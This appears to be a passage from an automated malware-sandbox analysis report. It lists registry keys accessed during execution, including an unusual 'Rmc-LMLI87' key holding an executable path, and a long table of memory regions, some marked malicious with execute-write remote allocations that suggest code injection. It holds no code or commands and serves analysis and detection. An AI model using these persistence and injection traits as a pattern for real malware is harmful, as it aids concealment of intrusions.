HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3272F
3272F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\3272F
3272F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Rmc-LMLI87
exepath
HKEY_CURRENT_USER\Software\Rmc-LMLI87
licence
HKEY_CURRENT_USER\Software\Rmc-LMLI87
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 342 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
4527000
trusted library allocation
page read and write
malicious
4F5000
heap
page read and write
malicious
21BE000
stack
page read and write
malicious
92B0000
trusted library section
page read and write
malicious
511000
heap
page read and write
malicious
4F0000
heap
page read and write
1F50000
heap
page read and write
328000
heap
page read and write
2F70000
heap
page read and write
90E000
stack
page read and write | page guard
A440000
trusted library allocation
page read and write
6BF000
stack
page read and write
10000000
direct allocation
page read and write
8E0000
heap
page read and write
3EBC000
heap
page read and write
30E5000
trusted library allocation
page read and write
49F000
heap
page read and write
79A000
heap
page read and write
330000
heap
page execute and read and write
507E000
heap
page read and write
4D0000
heap
page read and write
3BE0000
heap
page read and write
1EED000
heap
page read and write
F0E000
stack
page read and write
1F94000
heap
page read and write
765000
heap
page read and write
511E000
stack
page read and write
4C1F000
stack
page read and write
890000
trusted library allocation
page read and write
5E5E000
stack
page read and write
3F3B000
heap
page read and write
356000
stack
page read and write
153000
trusted library allocation
page execute and read and write
266F000
stack
page read and write
4BD000
heap
page read and write
793000
heap
page read and write
190000
trusted library allocation
page read and write
3EC8000
heap
page read and write
4F8A000
heap
page read and write
27A000
heap
page read and write
91A000
trusted library allocation
page read and write
2B2A000
trusted library allocation
page read and write
4FF0000
heap
page read and write
35A000
stack
page read and write
7A9000
heap
page read and write
4F8C000
heap
page read and write
7B8000
heap
page read and write
39DC000
heap
page read and write
E0000
trusted library allocation
page read and write
42F000
heap
page read and write
3E40000
heap
page read and write
3EF2000
heap
page read and write
2D0C000
trusted library allocation
page read and write
C4F000
stack
page read and write
79A000
heap
page read and write
4BEE000
stack
page read and write
5B2000
heap
page read and write
61CE000
stack
page read and write
5043000
heap
page read and write
B69000
heap
page read and write
49F000
heap
page read and write
5DB000
heap
page read and write
870000
trusted library allocation
page read and write
316F000
stack
page read and write
3849000
trusted library allocation
page read and write
9F0000
trusted library allocation
page read and write
37C000
heap
page read and write
473000
system
page execute and read and write
2E90000
heap
page read and write
3E54000
heap
page read and write
295A000
trusted library allocation
page read and write
3CC1000
heap
page read and write
57E000
heap
page read and write
48C9000
heap
page read and write
9E2C000
stack
page read and write
10000
heap
page read and write
2F2E000
stack
page read and write
7A9000
heap
page read and write
86C000
stack
page read and write
2A72000
trusted library allocation
page read and write
25BE000
stack
page read and write
3520000
heap
page read and write
39E4000
heap
page read and write
4CBE000
stack
page read and write
2865000
trusted library allocation
page read and write
9BB0000
heap
page read and write
636000
heap
page read and write
3B1000
heap
page read and write
370000
heap
page read and write
38F000
heap
page read and write
82B1000
trusted library allocation
page read and write
26CE000
stack
page read and write
3EC7000
heap
page read and write
C4E000
stack
page read and write | page guard
D00000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
2C90000
heap
page read and write
3BE2000
heap
page read and write
F80000
trusted library allocation
page execute and read and write
B6C000
heap
page read and write
39FF000
heap
page read and write
3EB1000
heap
page read and write
41AD000
stack
page read and write
1F0F000
heap
page read and write
1E7E000
stack
page read and write
B5D000
heap
page read and write
E40000
trusted library allocation
page read and write
41A000
heap
page read and write
3EE000
heap
page read and write
497E000
stack
page read and write
3DF000
heap
page read and write
550000
heap
page read and write
474000
remote allocation
page execute and read and write
47E000
heap
page read and write
30000
heap
page read and write
2A9F000
trusted library allocation
page read and write
F00000
trusted library allocation
page execute and read and write
3E6000
heap
page read and write
DF0000
heap
page execute and read and write
CD6000
heap
page execute and read and write
CC0000
trusted library allocation
page read and write
3831000
trusted library allocation
page read and write
1B6000
stack
page read and write
C7E000
stack
page read and write | page guard
14A000
trusted library allocation
page read and write
5BE000
heap
page read and write
8AA000
heap
page read and write
793000
heap
page read and write
39FE000
stack
page read and write
2CFC000
trusted library allocation
page read and write
5F40000
heap
page read and write
3A12000
heap
page read and write
2BDC000
stack
page read and write
F4E000
stack
page read and write
48C2000
heap
page read and write
799000
trusted library allocation
page read and write
399000
heap
page read and write
28BC000
trusted library allocation
page read and write
42B8000
heap
page read and write
1F0000
heap
page read and write
39F9000
heap
page read and write
A3D0000
trusted library allocation
page read and write
521E000
stack
page read and write
8D0000
trusted library allocation
page read and write
2BCB000
heap
page read and write
20000
heap
page read and write
4E00000
heap
page read and write
990000
trusted library allocation
page read and write
B74000
heap
page read and write
3B000
heap
page read and write
247E000
stack
page read and write
4710000
heap
page read and write
3B9E000
stack
page read and write
1ECE000
stack
page read and write
32D000
heap
page read and write
DC000
stack
page read and write
4FE000
heap
page read and write
3CB0000
heap
page read and write
877000
heap
page read and write
3EF2000
heap
page read and write
A440000
trusted library allocation
page read and write
3FA000
heap
page read and write
45AF000
stack
page read and write
1F10000
heap
page read and write
4BA0000
heap
page read and write
800000
trusted library allocation
page execute and read and write
A2FC000
stack
page read and write
45B0000
trusted library allocation
page read and write
7A9000
heap
page read and write
5B7000
heap
page read and write
E60000
trusted library allocation
page read and write
2BE9000
trusted library allocation
page read and write
320000
heap
page read and write
5D8E000
stack
page read and write
3970000
trusted library allocation
page read and write
957D000
heap
page read and write
140000
trusted library allocation
page read and write
3A01000
heap
page read and write
47E000
stack
page read and write
9570000
heap
page read and write
B69000
heap
page read and write
3EEF000
heap
page read and write
4FE2000
heap
page read and write
3AD000
heap
page read and write
4751000
heap
page read and write
7A9000
heap
page read and write
1E58000
heap
page read and write
48C2000
heap
page read and write
133000
trusted library allocation
page execute and read and write
10BF000
stack
page read and write
383000
heap
page read and write
95A000
stack
page read and write
352000
heap
page read and write
2D7000
stack
page read and write
385E000
stack
page read and write
84D000
stack
page read and write
3AB7000
heap
page read and write
400000
system
page execute and read and write
9578000
heap
page read and write
205000
trusted library allocation
page execute and read and write
47AB000
heap
page read and write
A1FD000
stack
page read and write
4B9E000
stack
page read and write
4802000
heap
page read and write
2FB000
heap
page read and write
5E0000
heap
page read and write
160000
trusted library allocation
page read and write
42F000
heap
page read and write
461000
heap
page read and write
1F60000
direct allocation
page read and write
32B000
heap
page read and write
399000
heap
page read and write
7B7000
heap
page read and write
48BD000
heap
page read and write
2DC0000
heap
page read and write
A440000
trusted library allocation
page read and write
284B000
trusted library allocation
page read and write
793000
heap
page read and write
7C0000
trusted library allocation
page execute and read and write
7B7000
heap
page read and write
5150000
heap
page read and write
7B7000
heap
page read and write
42B000
heap
page read and write
32E000
heap
page read and write
557000
heap
page read and write
49F000
heap
page read and write
42F000
heap
page read and write
BD1000
heap
page read and write
880000
trusted library allocation
page read and write
D40000
trusted library allocation
page read and write
3A9000
heap
page read and write
53D000
heap
page read and write
4B7000
heap
page read and write
244F000
stack
page read and write
507C000
heap
page read and write
280000
trusted library allocation
page read and write
128F000
stack
page read and write
48C1000
heap
page read and write
32B000
heap
page read and write
C7F000
stack
page read and write
E50000
trusted library allocation
page read and write
60E000
heap
page read and write
3C0000
heap
page read and write
39F4000
heap
page read and write
417000
heap
page read and write
20D000
stack
page read and write
150000
trusted library allocation
page read and write
20000
heap
page read and write
45D000
system
page execute and read and write
8D000
stack
page read and write
11DF000
stack
page read and write
73B000
heap
page read and write
3670000
heap
page read and write
2A7B000
trusted library allocation
page read and write
138E000
stack
page read and write
79C000
heap
page read and write
5D6F000
stack
page read and write
B9B000
heap
page read and write
108C000
stack
page read and write
716000
heap
page read and write
86E000
stack
page read and write
D3A000
trusted library allocation
page read and write
5A7000
heap
page read and write
E80000
trusted library allocation
page execute and read and write
E5E000
stack
page read and write
50C000
heap
page read and write
5B0000
heap
page read and write
202000
trusted library allocation
page read and write
3E3C000
stack
page read and write
3C8000
heap
page read and write
3BE9000
heap
page read and write
4F84000
heap
page read and write
10000
heap
page read and write
4CE000
stack
page read and write
1EA1000
heap
page read and write
D50000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
140000
trusted library allocation
page read and write
268F000
stack
page read and write
4EA000
heap
page read and write
28C000
heap
page read and write
A440000
trusted library allocation
page read and write
5D6E000
stack
page read and write | page guard
394000
heap
page read and write
74A000
heap
page read and write
459000
system
page execute and read and write
37B000
heap
page read and write
388000
heap
page read and write
20C000
stack
page read and write
2EBB000
heap
page read and write
A440000
trusted library allocation
page read and write
99F0000
heap
page read and write
449F000
stack
page read and write
E90000
trusted library allocation
page read and write
37B4000
heap
page read and write
EAF000
stack
page read and write
50CE000
stack
page read and write
F9E000
stack
page read and write
8CD000
stack
page read and write
D21000
trusted library allocation
page read and write
482B000
heap
page read and write
4E0E000
stack
page read and write
A0E000
stack
page read and write
20000
heap
page read and write
7B0000
heap
page read and write
3A12000
heap
page read and write
4FA0000
heap
page read and write
37AF000
stack
page read and write
2B9E000
stack
page read and write
A440000
trusted library allocation
page read and write
2DB000
heap
page read and write
704000
heap
page read and write
13AE000
stack
page read and write
E70000
trusted library allocation
page read and write
368F000
stack
page read and write
48B7000
heap
page read and write
2B6E000
trusted library allocation
page read and write
2A88000
trusted library allocation
page read and write
A06F000
stack
page read and write
79C000
heap
page read and write
996D000
stack
page read and write
134000
trusted library allocation
page read and write
30000
heap
page read and write
167000
trusted library allocation
page execute and read and write
4FCD000
heap
page read and write
2B7F000
trusted library allocation
page read and write
1E8E000
heap
page read and write
30A0000
heap
page read and write
3BE000
heap
page read and write
3640000
heap
page read and write
4A4B000
stack
page read and write
127000
stack
page read and write
B6C000
heap
page read and write
49B000
heap
page read and write
100000
heap
page read and write
9F6F000
stack
page read and write
39E1000
heap
page read and write
39F1000
heap
page read and write
510E000
stack
page read and write
7B7000
heap
page read and write
39000
heap
page read and write
7E6000
heap
page execute and read and write
4A8E000
stack
page read and write
6D0000
remote allocation
page read and write
386D000
stack
page read and write
3E6000
heap
page read and write
47C000
heap
page read and write
61B000
heap
page read and write
1F12000
heap
page read and write
508F000
stack
page read and write
2AE1000
trusted library allocation
page read and write
4BDE000
stack
page read and write
412000
heap
page read and write
3EAF000
heap
page read and write
4E0000
heap
page read and write
399000
heap
page read and write
48C9000
heap
page read and write
A1BF000
stack
page read and write
400000
system
page execute and read and write
345F000
stack
page read and write
5D9000
heap
page read and write
456000
system
page execute and read and write
33F000
stack
page read and write
41B000
system
page execute and read and write
7A0000
trusted library allocation
page read and write
3FF0000
heap
page read and write
104E000
stack
page read and write
399000
heap
page read and write
2030000
heap
page read and write
37D000
stack
page read and write
3849000
trusted library allocation
page read and write
9A2F000
heap
page read and write
E92000
trusted library allocation
page read and write
3821000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
3A12000
heap
page read and write
3FC9000
heap
page read and write
A440000
trusted library allocation
page read and write
623E000
stack
page read and write
7B7000
heap
page read and write
45B0000
trusted library allocation
page read and write
381F000
stack
page read and write
4AF000
heap
page read and write
29DE000
stack
page read and write
4C50000
heap
page read and write
BDB000
heap
page read and write
9F2D000
stack
page read and write
30E1000
trusted library allocation
page read and write
2FCE000
stack
page read and write
10BE000
stack
page read and write | page guard
37B0000
heap
page read and write
2C1C000
trusted library allocation
page read and write
243E000
stack
page read and write
41F000
system
page execute and read and write
2010000
heap
page read and write
5E60000
heap
page read and write
10000
heap
page read and write
7A9000
heap
page read and write
D35000
trusted library allocation
page read and write
1E9E000
heap
page read and write
360000
heap
page read and write
494000
heap
page read and write
62B1000
trusted library allocation
page read and write
1A4000
trusted library allocation
page read and write
A3D000
stack
page read and write
36D000
heap
page read and write
254F000
stack
page read and write
997000
heap
page read and write
49F000
heap
page read and write
3B2E000
stack
page read and write
39D000
heap
page read and write
130000
trusted library allocation
page read and write
2E7C000
stack
page read and write
3EBF000
heap
page read and write
315000
heap
page read and write
3E4F000
heap
page read and write
BDE000
heap
page read and write
357E000
stack
page read and write
66A000
heap
page read and write
106000
heap
page read and write
2B0A000
trusted library allocation
page read and write
2B0C000
stack
page read and write
48AB000
heap
page read and write
22DF000
stack
page read and write
986E000
stack
page read and write
2F0000
heap
page read and write
1EB000
stack
page read and write
30E0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
580000
heap
page read and write
2A8C000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
2D3F000
stack
page read and write
2B0000
heap
page read and write
B2B1000
trusted library allocation
page read and write
26CF000
stack
page read and write
289000
heap
page read and write
A3C000
stack
page read and write
D50000
trusted library allocation
page read and write
1FA3000
heap
page read and write
794000
heap
page read and write
970000
trusted library allocation
page execute and read and write
A830000
heap
page read and write
3A9000
heap
page read and write
5D1E000
stack
page read and write
8B000
stack
page read and write
49F000
heap
page read and write
ED0000
trusted library allocation
page read and write
4B5E000
stack
page read and write
4F54000
heap
page read and write
3BD0000
heap
page read and write
3EF2000
heap
page read and write
3600000
heap
page read and write
2E0000
trusted library allocation
page read and write
F50000
trusted library allocation
page read and write
3A2000
heap
page read and write
3FE000
stack
page read and write
48C5000
heap
page read and write
99E000
stack
page read and write
E30000
trusted library allocation
page read and write
2C00000
heap
page read and write
D2E000
trusted library allocation
page read and write
BF0000
trusted library allocation
page read and write
3BD000
stack
page read and write
39DC000
heap
page read and write
292F000
stack
page read and write
2EB0000
heap
page read and write
30E4000
trusted library allocation
page read and write
CCB1000
trusted library allocation
page read and write
606E000
stack
page read and write
79A000
heap
page read and write
56A000
heap
page read and write
49B000
heap
page read and write
8A0000
trusted library allocation
page read and write
224C000
stack
page read and write
16A000
trusted library allocation
page read and write
5AE000
stack
page read and write
4D7000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
3849000
trusted library allocation
page read and write
49F000
heap
page read and write
2A84000
trusted library allocation
page read and write
8B0000
heap
page read and write
6D0000
remote allocation
page read and write
2800000
trusted library allocation
page read and write
111E000
stack
page read and write
28C000
stack
page read and write
DF0000
trusted library allocation
page read and write
4B0000
heap
page read and write
BDE000
heap
page read and write
49F000
heap
page read and write
DED000
stack
page read and write
4F9E000
stack
page read and write
327000
heap
page read and write
26E000
heap
page read and write
3F3E000
heap
page read and write
71F000
heap
page read and write
4D5000
heap
page read and write
A3D0000
trusted library allocation
page read and write
5FE1000
heap
page read and write
6E0000
heap
page read and write
1E90000
heap
page read and write
497000
heap
page read and write
28C000
heap
page read and write
4D83000
heap
page read and write
104000
heap
page read and write
288E000
stack
page read and write
BE0000
trusted library allocation
page read and write
3EAE000
heap
page read and write
2700000
trusted library allocation
page read and write
660000
heap
page read and write
3BB000
heap
page read and write
A440000
trusted library allocation
page read and write
20000
heap
page read and write
B52000
heap
page read and write
4389000
trusted library allocation
page read and write
1BB000
stack
page read and write
4D4E000
stack
page read and write
5C84000
heap
page read and write
478000
remote allocation
page execute and read and write
49FF000
stack
page read and write
280000
heap
page read and write
2AE5000
trusted library allocation
page read and write
4F80000
heap
page read and write
9A1F000
heap
page read and write
4DBD000
stack
page read and write
10000
heap
page read and write
30E2000
trusted library allocation
page read and write
282000
trusted library allocation
page read and write
3EC7000
heap
page read and write
4D4000
heap
page read and write
1D50000
heap
page read and write
3E52000
heap
page read and write
508E000
stack
page read and write | page guard
397000
heap
page read and write
478C000
heap
page read and write
EF0000
heap
page execute and read and write
A440000
trusted library allocation
page read and write
1E50000
heap
page read and write
10000
heap
page read and write
10000
heap
page read and write
10000
heap
page read and write
1EF4000
heap
page read and write
89000
stack
page read and write
3EF2000
heap
page read and write
D60000
trusted library allocation
page read and write
8CB1000
trusted library allocation
page read and write
38DF000
stack
page read and write
1E54000
heap
page read and write
1FB2000
heap
page read and write
366000
heap
page read and write
2A72000
trusted library allocation
page read and write
879000
trusted library allocation
page read and write
CD000
stack
page read and write
25B000
stack
page read and write
2FE000
heap
page read and write
210000
trusted library allocation
page read and write
5B2000
heap
page read and write
574000
heap
page read and write
2BC0000
heap
page read and write
39A000
heap
page read and write
2B5D000
trusted library allocation
page read and write
63F000
heap
page read and write
4030000
heap
page read and write
471000
heap
page read and write
7D0000
trusted library allocation
page read and write
E2F000
stack
page read and write
72B1000
trusted library allocation
page read and write
519E000
stack
page read and write
30E3000
trusted library allocation
page read and write
330000
heap
page read and write
400000
system
page execute and read and write
FE0000
trusted library allocation
page execute and read and write
2F2C000
stack
page read and write
493F000
stack
page read and write
C9E000
stack
page read and write
B69000
heap
page read and write
290000
trusted library allocation
page execute and read and write
AC0000
heap
page read and write
D62000
trusted library allocation
page read and write
215F000
stack
page read and write
3CEE000
stack
page read and write
9B0000
heap
page read and write
9CE000
stack
page read and write
377000
heap
page read and write
9B20000
heap
page read and write
100000
heap
page read and write
873000
trusted library allocation
page read and write
B4D000
heap
page read and write
3EF4000
heap
page read and write
373000
heap
page read and write
49C000
heap
page read and write
245F000
stack
page read and write
D6B1000
trusted library allocation
page read and write
DED000
stack
page read and write
3A8000
heap
page read and write
39E9000
heap
page read and write
3ED0000
heap
page read and write
C40000
heap
page read and write
102E000
stack
page read and write
417000
heap
page read and write
1A3000
trusted library allocation
page execute and read and write
612000
heap
page read and write
790000
trusted library allocation
page read and write
A58000
heap
page read and write
38E1000
heap
page read and write
3FC0000
heap
page read and write
990000
heap
page read and write
455000
heap
page read and write
71B5000
trusted library allocation
page read and write
3D0000
heap
page read and write
4CD000
heap
page read and write
B81000
heap
page read and write
4FB0000
heap
page read and write
EC0000
trusted library allocation
page read and write
4CDE000
stack
page read and write
370000
trusted library allocation
page read and write
162000
trusted library allocation
page read and write
B53000
heap
page read and write
2A0000
heap
page read and write
13A000
stack
page read and write
870000
heap
page read and write
4750000
heap
page read and write
5CA2000
heap
page read and write
3FC5000
heap
page read and write
26BE000
stack
page read and write
870000
trusted library allocation
page read and write
1ED0000
heap
page read and write
D70000
heap
page read and write
1D8B000
heap
page read and write
2AE000
unkown
page read and write
13AE000
stack
page read and write
238000
stack
page read and write
4BCE000
stack
page read and write
2BE0000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
3C0000
heap
page read and write
5090000
heap
page read and write
48AC000
heap
page read and write
9A34000
heap
page read and write
A440000
trusted library allocation
page read and write
2821000
trusted library allocation
page read and write
79C000
heap
page read and write
38E0000
heap
page read and write
3E0000
heap
page read and write
F6F000
stack
page read and write
710000
heap
page read and write
10000
heap
page read and write
25C000
stack
page read and write
E10000
trusted library allocation
page read and write
BD1000
heap
page read and write
630000
heap
page read and write
9DE000
stack
page read and write
39DE000
stack
page read and write
377000
trusted library allocation
page read and write
5E9D000
stack
page read and write
5230000
heap
page read and write
910000
trusted library allocation
page read and write
4C4E000
stack
page read and write
2C1C000
heap
page read and write
2F7000
heap
page read and write
32E000
stack
page read and write
59B000
heap
page read and write
CF0000
trusted library allocation
page read and write
355000
heap
page read and write
C00000
trusted library allocation
page read and write
122000
heap
page read and write
B5C000
heap
page read and write
920000
trusted library allocation
page read and write
210000
trusted library allocation
page execute and read and write
EE0000
trusted library allocation
page read and write
717000
heap
page read and write
33F000
heap
page read and write
29DE000
stack
page read and write
352000
heap
page read and write
9A0D000
heap
page read and write
399000
heap
page read and write
3EF2000
heap
page read and write
230000
heap
page read and write
283E000
trusted library allocation
page read and write
61F000
heap
page read and write
88B000
stack
page read and write
A90000
trusted library allocation
page read and write
5C80000
heap
page read and write
426000
heap
page read and write
630000
heap
page read and write
30A000
heap
page read and write
2B40000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
45C000
system
page execute and read and write
39F4000
heap
page read and write
372000
heap
page read and write
482A000
heap
page read and write
4841000
heap
page read and write
B78000
heap
page read and write
5252000
heap
page read and write
90F000
stack
page read and write
FDB000
stack
page read and write
1D2000
stack
page read and write
3EB2000
heap
page read and write
4F70000
heap
page read and write
DCE000
stack
page read and write
A0B0000
heap
page read and write
B50000
heap
page read and write
650000
trusted library allocation
page read and write
23DE000
stack
page read and write
2863000
trusted library allocation
page read and write
27F000
heap
page read and write
121B000
stack
page read and write
B51000
heap
page read and write
502C000
heap
page read and write
1D4000
stack
page read and write
3821000
trusted library allocation
page read and write
48AB000
heap
page read and write
9CEF000
stack
page read and write
330000
heap
page read and write
BCB1000
trusted library allocation
page read and write
9B9C000
stack
page read and write
3EDC000
heap
page read and write
2F0000
heap
page read and write
7BC000
heap
page read and write
160000
trusted library allocation
page read and write
F70000
trusted library allocation
page read and write
295B000
trusted library allocation
page read and write
2E40000
heap
page read and write
373000
trusted library allocation
page read and write
3EC7000
heap
page read and write
372B000
heap
page read and write
716000
heap
page read and write
639000
heap
page read and write
39FA000
heap
page read and write
95D000
stack
page read and write
E2E000
stack
page read and write | page guard
5E82000
heap
page read and write
48C2000
heap
page read and write
3EC7000
heap
page read and write
36A6000
heap
page read and write
3EB7000
heap
page read and write
1E5B000
heap
page read and write
4C0E000
stack
page read and write
5E64000
heap
page read and write
3AF000
heap
page read and write
2BD000
heap
page read and write
980000
trusted library allocation
page read and write
2DF0000
heap
page read and write
200000
trusted library allocation
page read and write
3F7000
heap
page read and write
79C000
heap
page read and write
10016000
direct allocation
page execute and read and write
48C2000
heap
page read and write
6070000
heap
page read and write
B6F000
heap
page read and write
237000
heap
page read and write
39E0000
heap
page read and write
165000
trusted library allocation
page execute and read and write
3EAF000
heap
page read and write
2AC1000
trusted library allocation
page read and write
136000
stack
page read and write
895000
heap
page read and write
E30000
trusted library allocation
page execute and read and write
B30000
heap
page read and write
423000
heap
page read and write
3F3E000
heap
page read and write
A80000
trusted library allocation
page read and write
10BD000
stack
page read and write
7E0000
heap
page execute and read and write
2B01000
trusted library allocation
page read and write
42F000
heap
page read and write
47AB000
heap
page read and write
3EA9000
heap
page read and write
BD3000
heap
page read and write
48B3000
heap
page read and write
77E000
stack
page read and write
4DBE000
stack
page read and write
48C8000
heap
page read and write
157000
stack
page read and write
10000
heap
page read and write
890000
heap
